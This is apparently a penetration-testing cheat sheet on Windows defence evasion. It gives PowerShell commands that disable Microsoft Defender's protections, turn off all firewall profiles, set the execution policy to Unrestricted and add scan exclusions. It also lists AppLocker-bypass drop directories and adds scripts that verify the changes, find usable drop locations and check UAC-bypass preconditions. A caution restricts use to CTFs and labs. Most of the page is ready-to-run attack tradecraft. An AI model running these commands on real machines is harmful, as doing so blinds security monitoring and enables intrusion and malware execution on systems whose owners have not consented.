Defence Evasion

Caution

Only use these in controlled test environments that can be reset easily (e.g. CTFs, boot2root, OffSec exams). Nearly every command below needs an elevated (administrator) PowerShell session, and all of them are loud: the changes are logged and will be flagged by any monitoring that is in place.

Disabling defences

Disable Defender, all firewall profiles and set the execution policy to Unrestricted (elevated shell; the Defender changes are ignored if Tamper Protection is on):

Set-ExecutionPolicy Unrestricted -Force;Set-NetFirewallProfile -Profile Domain,Public,Private -Enabled False;Set-MpPreference -DisableRealtimeMonitoring $true;Set-MpPreference -DisableIOAVProtection $true;Set-MpPreference -DisableBehaviorMonitoring $true;Set-MpPreference -DisableBlockAtFirstSeen $true;Set-MpPreference -DisableEmailScanning $true;Set-MpPreference -DisableScriptScanning $true

Execution Policy blocking commands

powershell -NoExit -ExecutionPolicy Bypass [-Command "<optional cmd you wish to run>"]

# show the effective execution policy (add -List to see every scope)
Get-ExecutionPolicy

# set the execution policy to Unrestricted (persistent; the default LocalMachine scope needs admin).
# -Scope Process changes it for the current session only and needs no admin rights.
Set-ExecutionPolicy Unrestricted -Force

Firewall

# Disable all Firewall profiles (requires admin privileges).
Set-NetFirewallProfile -Profile Domain,Public,Private -Enabled False

# Same thing, shorter: with no -Profile it applies to every profile
Set-NetFirewallProfile -Enabled False
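Disabling every profile is the noisiest option. The following is an added example (not from the original page) that records the profile state, opens only the single inbound port a listener needs, and undoes both afterwards. The port 4444 and the rule name are assumptions; change them to match your setup. Run it from an elevated shell.

```powershell
# Added example, not part of the original page. Port and rule name are assumed values.
function Get-FwProfileState {
    # Snapshot of what we may change, so the cleanup step restores exactly that.
    Get-NetFirewallProfile | Select-Object Name, Enabled, DefaultInboundAction
}

$before = Get-FwProfileState
$before | Format-Table -AutoSize

# Narrow alternative to 'Set-NetFirewallProfile -Enabled False':
# allow one inbound TCP port on all profiles and nothing else.
$ruleName = 'CTF-Listener-4444'   # assumed name
New-NetFirewallRule -DisplayName $ruleName -Direction Inbound -Protocol TCP `
    -LocalPort 4444 -Action Allow -Profile Any | Out-Null

# Verify the rule exists and is enabled before relying on it
Get-NetFirewallRule -DisplayName $ruleName |
    Select-Object DisplayName, Enabled, Direction, Action

# ... do the work ...

# Cleanup: drop the rule and put every profile back to its recorded state
Remove-NetFirewallRule -DisplayName $ruleName
foreach ($p in $before) {
    Set-NetFirewallProfile -Name $p.Name -Enabled $p.Enabled
}
```

If you did disable the profiles with the one-liner above, the final loop is what restores them; keep the `$before` snapshot from before any change.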

Defender

# Turn off everything and add an exclusion for "C:\Windows\Temp"
Set-MpPreference -DisableRealtimeMonitoring $true;Set-MpPreference -DisableIOAVProtection $true;Set-MpPreference -DisableBehaviorMonitoring $true;Set-MpPreference -DisableBlockAtFirstSeen $true;Set-MpPreference -DisableEmailScanning $true;Set-MpPreference -DisableScriptScanning $true;Add-MpPreference -ExclusionPath "C:\Windows\Temp"

# -----

# Check if Defender is enabled
Get-MpComputerStatus
Get-MpComputerStatus | Select AntivirusEnabled

# Check if defensive modules are enabled
Get-MpComputerStatus | Select RealTimeProtectionEnabled, IoavProtectionEnabled,AntispywareEnabled | FL

# Check if tamper protection is enabled (True means the Set-MpPreference changes below are ignored)
Get-MpComputerStatus | Select IsTamperProtected,RealTimeProtectionEnabled | FL

# -----

# Disables realtime monitoring
Set-MpPreference -DisableRealtimeMonitoring $true

# Disables scanning for downloaded files or attachments
Set-MpPreference -DisableIOAVProtection $true

# Disable behaviour monitoring (the parameter is spelled -DisableBehaviorMonitoring)
Set-MpPreference -DisableBehaviorMonitoring $true

# Make exclusion for a certain folder
Add-MpPreference -ExclusionPath "C:\Windows\Temp"

# Disables Block at First Sight (the cloud check on files Defender has not seen before)
Set-MpPreference -DisableBlockAtFirstSeen $true

# Disables scanning of .pst and other email formats
Set-MPPreference -DisableEmailScanning $true

# Disables script scanning during malware scans
Set-MPPReference -DisableScriptScanning $true

# Exclude files by extension (Add- appends; Set-MpPreference -ExclusionExtension would replace the existing list)
Add-MpPreference -ExclusionExtension "ps1"
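The individual commands above do not tell you whether a change actually took effect. This added example (not from the original page) checks Tamper Protection first, records the current preferences, applies the same set of changes, verifies them against the engine's own status rather than the preference store, and restores everything at the end. The only assumption is the exclusion path C:\Windows\Temp, reused from above. Run it from an elevated shell.

```powershell
# Added example, not part of the original page.
$status = Get-MpComputerStatus
if ($status.IsTamperProtected) {
    Write-Warning 'Tamper Protection is on: Set-MpPreference changes to these settings will be ignored.'
}

# The preference switches we are about to flip
$settings = 'DisableRealtimeMonitoring', 'DisableIOAVProtection', 'DisableBehaviorMonitoring',
            'DisableBlockAtFirstSeen', 'DisableEmailScanning', 'DisableScriptScanning'

# Snapshot current values so the restore step is exact
$pref   = Get-MpPreference
$before = @{}
foreach ($s in $settings) { $before[$s] = $pref.$s }

# Apply: each switch is passed by name via splatting
foreach ($s in $settings) {
    $p = @{ $s = $true }
    Set-MpPreference @p
}
Add-MpPreference -ExclusionPath 'C:\Windows\Temp'   # assumed path, same as above

# Verify what the engine reports, not just what the preference store says
Get-MpComputerStatus |
    Select-Object RealTimeProtectionEnabled, IoavProtectionEnabled, BehaviorMonitorEnabled, IsTamperProtected |
    Format-List
(Get-MpPreference).ExclusionPath

# ... do the work ...

# Restore the recorded values and remove the exclusion
foreach ($s in $settings) {
    $p = @{ $s = $before[$s] }
    Set-MpPreference @p
}
Remove-MpPreference -ExclusionPath 'C:\Windows\Temp'
```

If `RealTimeProtectionEnabled` is still True after the apply step, Tamper Protection (or a policy pushed by management) is enforcing it, and no amount of `Set-MpPreference` will change that.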

Ref: https://viperone.gitbook.io/pentest-everything/everything/everything-active-directory/defense-evasion/disable-defender#firewall

AppLocker

Directories under C:\Windows that standard users can write to by default. The default AppLocker executable rules allow everything under %WINDIR%, so a binary dropped into one of these runs even though the user's own profile directories are blocked:

C:\windows\tasks

C:\Windows\System32\spool\drivers\color

Ref: https://github.com/api0cradle/UltimateAppLockerByPassList/tree/master?tab=readme-ov-file
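Whether a given directory is still writable, and whether the effective policy actually allows execution from it, varies per host. This added example (not from the original page) probes each candidate by writing a zero-byte `probe.exe` (assumed name) into it and asking the effective AppLocker policy how it would treat that file for the current user; the directory list is the two from above and can be extended with any others from the reference. The probe file is removed afterwards.

```powershell
# Added example, not part of the original page. 'probe.exe' is an assumed file name.
$candidates = 'C:\Windows\Tasks', 'C:\Windows\System32\spool\drivers\color'

# Effective policy = local policy merged with any AppLocker GPOs applied to this host.
# On a host with no AppLocker rules at all, every decision comes back as allowed.
$policy = Get-AppLockerPolicy -Effective

foreach ($dir in $candidates) {
    $probe = Join-Path $dir 'probe.exe'
    $row = [ordered]@{ Directory = $dir; Writable = $false; PolicyDecision = 'n/a'; MatchingRule = $null }
    try {
        # A zero-byte file is enough: path rules only look at the location
        [IO.File]::WriteAllBytes($probe, [byte[]]@())
        $row.Writable = $true

        # Evaluate the probe against the effective policy as the current user
        $verdict = $policy | Test-AppLockerPolicy -Path $probe
        $row.PolicyDecision = $verdict.PolicyDecision
        $row.MatchingRule   = $verdict.MatchingRule
    }
    catch {
        # Not writable (or policy evaluation failed); leave the row as-is
    }
    finally {
        if (Test-Path -LiteralPath $probe) { Remove-Item -LiteralPath $probe -Force }
    }
    [pscustomobject]$row
}
```

A row with `Writable = True` and `PolicyDecision = Allowed` is a usable drop location; a writable directory that comes back `Denied` means the admin has added an explicit deny rule for it, which is exactly what the reference list is meant to be checked against.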

UAC Bypass

The repo below has a great list of UAC bypasses for various conditions (GUI, DLL hijack, auto-elevated COM interfaces, etc.), including the Windows builds in which each method was fixed. Easily modifiable to create a BOF or tool which does the same thing. Check the UAC level first: the auto-elevation based methods only apply when UAC is set below "Always notify" and the current user is a local admin running with a filtered (medium-integrity) token.

Defeating Windows User Account Control Ref: https://github.com/hfiref0x/UACME
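Before picking a method from UACME it is worth confirming the preconditions on the target. This added example (not from the original page, nor from the UACME project) reads the UAC policy values from the registry, resolves the prompt level, and checks whether the current session is a local admin with a filtered token. It assumes an English locale for the `whoami /groups` output it parses.

```powershell
# Added example, not part of the original page or of UACME.
$key = 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System'
$uac = Get-ItemProperty -Path $key

# ConsentPromptBehaviorAdmin decides how an admin is prompted for elevation
$level = switch ($uac.ConsentPromptBehaviorAdmin) {
    0 { 'Elevate without prompting' }
    1 { 'Prompt for credentials on the secure desktop' }
    2 { 'Prompt for consent on the secure desktop' }
    3 { 'Prompt for credentials' }
    4 { 'Prompt for consent' }
    5 { 'Prompt for consent for non-Windows binaries (default)' }
    default { "Unknown ($($uac.ConsentPromptBehaviorAdmin))" }
}
# "Always notify" = consent on the secure desktop for everything, which blocks auto-elevation
$alwaysNotify = ($uac.ConsentPromptBehaviorAdmin -eq 2 -and $uac.PromptOnSecureDesktop -eq 1)

# Token view: is BUILTIN\Administrators present (even deny-only), and at what integrity level
$groups    = whoami /groups                                  # assumes English output
$isAdmin   = [bool]($groups -match 'S-1-5-32-544')
$integrity = ($groups -match 'Mandatory Label' | Select-Object -First 1) `
             -replace '.*Mandatory Label\\', '' -replace '\s{2,}.*', ''

# IsInRole is only true when the admin SID is enabled, i.e. the process is already elevated
$elevated = ([Security.Principal.WindowsPrincipal][Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole(
                [Security.Principal.WindowsBuiltInRole]::Administrator)

[pscustomobject]@{
    EnableLUA         = $uac.EnableLUA
    PromptLevel       = $level
    AlwaysNotify      = $alwaysNotify
    LocalAdmin        = $isAdmin
    IntegrityLevel    = $integrity
    AlreadyElevated   = $elevated
    BypassWorthTrying = ($uac.EnableLUA -eq 1 -and $isAdmin -and -not $elevated -and -not $alwaysNotify)
}
```

`BypassWorthTrying` is True only in the classic case: UAC is on, the user is an admin, the process is running at medium integrity, and the prompt level is below "Always notify". If `EnableLUA` is 0 or the process is already elevated there is nothing to bypass; if `AlwaysNotify` is True, drop the auto-elevation based methods from the list.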